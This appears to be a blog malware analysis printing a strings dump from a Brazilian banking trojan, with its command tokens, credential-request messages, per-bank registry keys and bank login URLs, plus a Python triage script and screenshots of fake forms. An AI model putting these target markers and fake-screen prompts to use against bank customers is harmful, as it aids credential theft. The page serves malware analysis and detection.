<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PRTSCR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Opcões de Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%)#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AeroEnabled</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AeroDesable</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TECLADO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#KeyPress Mouse </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#KeyPress </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDTEXT2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Mouse#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Navegador #</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">COLARTXT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POSTKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#POSTKEY Handle Mouse#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#POSTKEY Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#SENDKEY Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDIMPUT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Texto Colado SENDIMPUT#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERTIFICADO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtFrame</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Certificado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LIMPARCRT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">VERKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SJAVA#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HideCursor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ShowCursor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousedrop</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drop</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousedrag</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drag</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousemove</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">move</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MOUSE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MOVE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#MOVE Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CLICK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#CLICK Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CLICKORIGI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EXIT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">KILLNAV</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HIDEFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Oculto#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Inativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHOWFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Mostrado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDMSG</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Microsoft Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Google Chrome</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FREENAV</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TRAVAR24</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SICREDI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Block</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">KILLKL</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TELAFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITFISICA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITAFISICA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TELAGB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaFisica Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaFisica ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Token#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Senha6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Posicao Tabela#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETDTN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dia</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(dd)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mes</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(mm)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aaaa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ano</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(aaaa)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo opcao de data </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSGFIM</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Msg Final mostrada#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITEMPRESA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Ita Empresa Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Ita Empresa ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITPERSONAL</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaPersonal Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaPersonal ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITUNICLASS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaUniclass Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaUniclass ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BBF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake BBF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake BBF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake GF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake GF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSJAVA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Certificado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo SENHA8#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake CEF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake CEF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETASS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura fisica#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETASSJU</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura Juridica#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Bradesco Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Bradesco ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Tokem#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Chave#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSNCRT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake SANTA Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake SANTA ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Número de Serie#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTKT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">XP</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">W7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">W8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Tela Fake inativa#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pau no WatchImage#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BITM!</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pau no csImagemRead#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">identificacao.jsf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bradesco.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco bradesco</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iniciasessao.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iniciasessaolegado.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Block</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bb.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bb.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapf/login.jsp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/loginmpe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/logincor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/loginpfe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj.bb.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">verificando solução de segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internet banking</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santander.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santandernet.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">www.santandernetibe.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santanderempresarial.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Banco Santander Brasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco santander brasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sicreditotal</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sicredi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sicredi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\SICRED</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SICREDI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa.gov.br/SIIBC/index.processa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa econômica federal</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">siwinCtrl</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa.gov.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingpf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\CEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco itaú</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itau.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itauuniclass</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banklineplus</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">itaupersonnalite</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtFrame</span></div>
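<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">The dump above mixes four kinds of strings: bare upper-case command tokens (KILLNAV, HIDEFAKE, SHOWFAKE, GETTK and so on), MSG#...# status messages that read like feedback for the operator, one Software\Blackberry\ registry key per targeted bank, and the URL fragments and window titles used to recognise a banking session. The script below is an added example, written for this page and not taken from the sample or from the blog, that sorts a constructed subset of these strings into those four groups and then reuses the web markers to show which bank block a given window title or URL would trigger. Two things in it are assumptions rather than facts recovered from the binary: that each run of markers belongs to the registry key and tag that follow it in the dump, and that the sample matches markers as case-insensitive substrings of the foreground window title or URL. The window titles are made up, and the registry hive is not visible in the strings.</span></div>

```python
"""Triage a banker strings dump: added example, not the sample's or the blog's own code.
Sorts raw strings into command tokens, MSG# status messages, per-bank registry keys and
web markers, then shows which bank block a window title or URL would trigger."""
import re

# Constructed subset of the dump above, kept in its original order.
STRINGS_DUMP = r"""
KILLNAV
HIDEFAKE
MSG#Fake Oculto#
SHOWFAKE
MSG#Fake Mostrado#
-#-
banco bradesco
Software\Blackberry\BRAD
BRAD
bb.com.br
bancobrasil
aapf/login.jsp
Software\Blackberry\BB
BB
santander.com.br
Banco Santander Brasil
Software\Blackberry\SANTA
SANTA
sicredi
Software\Blackberry\SICRED
SICREDI
caixa.gov.br/SIIBC/index.processa
caixa econômica federal
Software\Blackberry\CEF
CEF
banco itaú
itau.com.br
Software\Blackberry\ITA
ITA
"""

STATUS_RE = re.compile(r"^MSG#")                          # operator/debug messages
REGKEY_RE = re.compile(r"^Software\\Blackberry\\(\w+)$")  # per-bank key; hive not in the dump
TOKEN_RE = re.compile(r"^[A-Z][A-Z0-9!]*$")               # bare upper-case command or tag

def classify(raw_lines):
    """Return (tokens, status, targets); targets maps bank tag -> registry key + markers."""
    tokens, status, targets = [], [], {}
    pending = []                  # web markers seen since the last bank block closed
    lines = [l.strip() for l in raw_lines if l.strip()]
    skip_next = False
    for line, nxt in zip(lines, lines[1:] + [""]):
        if skip_next:             # this line was already consumed as a bank tag
            skip_next = False
            continue
        if STATUS_RE.match(line):
            status.append(line[4:].rstrip("#").strip())
            continue
        key = REGKEY_RE.match(line)
        if key:
            tag = key.group(1)
            if TOKEN_RE.match(nxt):   # assumption: the tag follows its key in the dump
                tag, skip_next = nxt, True
            targets[tag] = {"registry_key": line, "markers": pending}
            pending = []
        elif TOKEN_RE.match(line):
            tokens.append(line)
        elif any(c.isalpha() for c in line):
            pending.append(line)  # URL fragment or window-title fragment
        # letter-less lines such as "-#-" are separators and are dropped
    return tokens, status, targets

def identify_target(text, targets):
    """Bank tag whose marker appears in the title/URL; substring match is an assumption."""
    hay = text.lower()
    for tag, info in targets.items():
        if any(m.lower() in hay for m in info["markers"]):
            return tag
    return None

TOKENS, STATUS, TARGETS = classify(STRINGS_DUMP.splitlines())

# Constructed window titles / URLs, not captured from a real victim.
SAMPLE_TITLES = [
    "Banco Bradesco | Internet Banking - Internet Explorer",
    "https://www2.bancobrasil.com.br/aapf/login.jsp",
    "Banco Santander Brasil - Google Chrome",
    "Caixa Econômica Federal - Mozilla Firefox",
    "Banco Itaú - Internet Banking 30 horas",
    "Google - Google Chrome",
]

def triage_titles(titles, targets=TARGETS):
    return [(t, identify_target(t, targets)) for t in titles]

if __name__ == "__main__":
    for tag, info in TARGETS.items():
        print(f"{tag:8}{info['registry_key']:28}{info['markers']}")
    for title, tag in triage_titles(SAMPLE_TITLES):
        print(f"{tag or '-':8}{title}")
```

<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Running the script prints one row per bank with its registry key and markers, then the tag each constructed title would trigger; a dash means no fake screen would fire. The same classifier can be pointed at a full strings output, but mixed-case words such as Block and titles such as internet banking would land in the marker list of whichever bank follows them, so review the grouping before turning it into detection content.</span></div>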
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">We already looked at the obfuscation method in earlier installments.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Fake forms displayed by this threat.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYRrnMumAfVYv3g7p1G5yHK6GCfBQQRDJoFaFI0eg6pNWjpgjZJjEB6SP-B9qAx8PoKPlqjn5fWm9c0wGaD-W7R4TU5Ku1sdp-R9G4vBEX5Re4-U8L8GoTR9XdeQ6Jt8raDqflV5gbPE/s1600/01-bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYRrnMumAfVYv3g7p1G5yHK6GCfBQQRDJoFaFI0eg6pNWjpgjZJjEB6SP-B9qAx8PoKPlqjn5fWm9c0wGaD-W7R4TU5Ku1sdp-R9G4vBEX5Re4-U8L8GoTR9XdeQ6Jt8raDqflV5gbPE/s320/01-bancodobrasil.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKZCjsKMH87VhmSM85FRxk5YhYpIQoF6-zjd8HoQ1hyphenhyphentHcneJPi2T4PY0mkoohxR-qp953StWUXAIRYibZBtIx7SJsqFc4NLy_S-sWd35XdndzIAd0WgAuJ_TrAA7Cbh6lHELdVLi9CbA/s1600/01-bradesco.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKZCjsKMH87VhmSM85FRxk5YhYpIQoF6-zjd8HoQ1hyphenhyphentHcneJPi2T4PY0mkoohxR-qp953StWUXAIRYibZBtIx7SJsqFc4NLy_S-sWd35XdndzIAd0WgAuJ_TrAA7Cbh6lHELdVLi9CbA/s320/01-bradesco.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDcBDJJOBpS9vBdOFXEFBMiC_snWX_KAwIX7pAHhZ4rrbKlCmRAycHfNF3jWKEw-DJiRVOsikDWMbqJXBw4LBuIucWBLfCBMI8SDqY72_vFqsCIa4Xt2HEFbDi0vksgrwFxVJFDT1c974/s1600/01-caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDcBDJJOBpS9vBdOFXEFBMiC_snWX_KAwIX7pAHhZ4rrbKlCmRAycHfNF3jWKEw-DJiRVOsikDWMbqJXBw4LBuIucWBLfCBMI8SDqY72_vFqsCIa4Xt2HEFbDi0vksgrwFxVJFDT1c974/s320/01-caixa.jpg" width="320" /></a></div>
<br />
